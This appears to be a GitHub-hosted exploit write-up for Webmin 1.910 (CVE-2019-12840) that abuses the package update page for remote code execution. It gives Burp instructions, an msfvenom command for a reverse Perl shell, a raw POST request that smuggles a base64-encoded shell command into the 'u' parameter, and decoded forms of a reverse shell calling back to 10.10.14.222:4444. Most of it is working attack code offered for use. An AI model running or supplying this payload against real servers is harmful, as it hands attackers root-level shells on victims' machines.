Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
67 lines (38 sloc) 2.93 KB
# Exploit Title: Webmin 1.910 - Remote Code Execution abusing Package Updates using BurpSuite
# Date: 11/13/19
# Exploit Author: BoxBois
# Version: Webmin 1.910
# Tested on: Linux
# CVE : 2019-12840
Exploit for webmin 1.910 Remote Command Execution vulnerability. If you have permission to login and update packages then you can remotely execute code as webmin (usually ran as root).
Use burp to make a post request to the webpage and paste the info below in your raw. Replace cookie's sid with your own sid, RHOST and RPORT to the victim IP and port, and PAYLOAD to your msfvenom generated payload. Have a nc listener running and enjoy your shell.
Basic msfvenom reverse perl payload creation script "msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.pl"
-------------------------------------------------
POST /package-updates/update.cgi HTTP/1.1
Host: [RHOST]:[RPORT]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: sid=[INPUT GOOD SID HERE]
Referer: [RHOST]:[RPORT]/package-updates/?xnavigation=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 432
Connection: close
u=acl%2Fapt&u=[PAYLOAD HERE]
--------------------------------------------------------
Proof of concept
POST /package-updates/update.cgi HTTP/1.1
Host: 10.10.10.xxx:10000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: sid=c6a571fc026f5565b3ea489081383bed
Referer: 10.10.10.xxx:10000/package-updates/?xnavigation=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 432
Connection: close
u=acl%2Fapt&u=%20%7C%20bash%20-c%20%22%7becho%2ccGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMjI6NDQ0NCIpO1NURElOLT5mZG9wZW4oJGMscik7JH4tPmZkb3BlbigkYyx3KTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTsn%7d%7c%7bbase64%2c-d%7d%7c%7bbash%2c-i%7d%22
--------------------------------------------------------
POC Payload Info
URL decoded
| bash -c "{echo,cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMjI6NDQ0NCIpO1NURElOLT5mZG9wZW4oJGMscik7JH4tPmZkb3BlbigkYyx3KTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTsn}|{base64,-d}|{bash,-i}"
base64 decoded
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.222:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
all together decoded
| bash -c "{echo,perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.222:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'}|{base64,-d}|{bash,-i}"
You can’t perform that action at this time.